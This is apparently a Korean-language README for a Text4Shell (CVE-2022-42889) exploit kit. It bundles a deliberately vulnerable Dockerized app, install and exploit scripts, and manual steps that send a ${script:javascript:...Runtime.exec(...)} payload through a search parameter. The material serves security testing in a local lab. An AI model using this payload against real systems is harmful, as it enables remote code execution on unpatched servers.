
CVE-2022-42889(Text4Shell)에 대한 자동화된 익스플로잇으로, 테스트 및 수동 악용 지침을 위한 취약한 Docker화된 앱을 포함합니다.
//자동 해킹용: 1../install.sh
2../exploit.sh
3.애플리케이션을 제거하려면 ./stopapp.sh를 사용하세요.
//수동 해킹용:
mvn clean install
docker build --tag=text4shell .
docker run -p 80:8080 text4shell
http://localhost/text4shell/attack?search=<anything>
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
dns 또는 url prefix를 사용해 볼 수도 있습니다.
컨테이너 ID 가져오기
docker container ls
docker exec -it <container_id> bash
/tmp 디렉터리에 foo라는 파일이 생성되었는지 확인하세요):ls /tmp/
docker container stop <container_id>